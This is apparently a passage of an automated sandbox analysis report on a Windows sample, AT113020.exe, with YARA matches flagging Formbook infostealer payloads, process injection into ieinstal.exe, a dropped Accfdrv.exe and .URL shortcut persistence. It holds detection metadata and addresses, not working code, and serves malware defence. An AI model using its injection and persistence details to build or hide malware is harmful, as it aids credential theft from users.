Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034F1002	2_2_034F1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0350E824	2_2_0350E824
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0345A830	2_2_0345A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_035028EC	2_2_035028EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0344B090	2_2_0344B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034620A0	2_2_034620A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_035020A8	2_2_035020A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0350DFCE	2_2_0350DFCE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03501FF1	2_2_03501FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034FD616	2_2_034FD616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03456E30	2_2_03456E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03502EF7	2_2_03502EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03501D55	2_2_03501D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03502D07	2_2_03502D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03430D20	2_2_03430D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_035025DD	2_2_035025DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0344D5E0	2_2_0344D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03462581	2_2_03462581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034FD466	2_2_034FD466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0344841F	2_2_0344841F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00464BC8	5_2_00464BC8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_004021B0	5_2_004021B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_004484D0	5_2_004484D0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00405758	5_2_00405758
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0041B012	6_2_0041B012
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0041B8CF	6_2_0041B8CF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00408A40	6_2_00408A40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0041B411	6_2_0041B411
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0041B5DA	6_2_0041B5DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A309	6_2_0309A309
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03142B28	6_2_03142B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309AB40	6_2_0309AB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0311CB4F	6_2_0311CB4F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A138B	6_2_030A138B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AEBB0	6_2_030AEBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0313DBD2	6_2_0313DBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031303DA	6_2_031303DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AABD8	6_2_030AABD8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031223E3	6_2_031223E3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0312FA2B	6_2_0312FA2B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309B236	6_2_0309B236
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031422AE	6_2_031422AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307F900	6_2_0307F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03131002	6_2_03131002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0314E824	6_2_0314E824
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B090	6_2_0308B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031420A8	6_2_031420A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031428EC	6_2_031428EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0314DFCE	6_2_0314DFCE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03141FF1	6_2_03141FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0313D616	6_2_0313D616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03096E30	6_2_03096E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03142EF7	6_2_03142EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03142D07	6_2_03142D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03070D20	6_2_03070D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03141D55	6_2_03141D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A2581	6_2_030A2581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03132D82	6_2_03132D82
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031425DD	6_2_031425DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308D5E0	6_2_0308D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308841F	6_2_0308841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0313D466	6_2_0313D466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309B477	6_2_0309B477
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134496	6_2_03134496

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 00419A50 appears 38 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 0307B150 appears 136 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 0343B150 appears 66 times
Source: C:\Users\user\Desktop\AT113020.exe	Code function: String function: 00404770 appears 83 times
Source: C:\Users\user\Desktop\AT113020.exe	Code function: String function: 00406C88 appears 62 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: String function: 0040FFEC appears 32 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: String function: 00404770 appears 109 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: String function: 00406C88 appears 63 times

PE file contains strange resources

Source: AT113020.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Accfdrv.exe.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: AT113020.exe, 00000001.00000002.239251872.0000000002430000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs AT113020.exe
Source: AT113020.exe, 00000001.00000002.239846712.0000000002780000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs AT113020.exe
Source: AT113020.exe, 00000001.00000002.239870107.0000000002790000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs AT113020.exe
Source: AT113020.exe, 00000001.00000002.242796472.0000000004790000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs AT113020.exe

Yara signature match

Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291050180.0000000004AD7000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.291050180.0000000004AD7000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.240199422.00000000027E7000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000001.00000002.240199422.00000000027E7000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.275922238.0000000002807000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000005.00000002.275922238.0000000002807000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED	Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
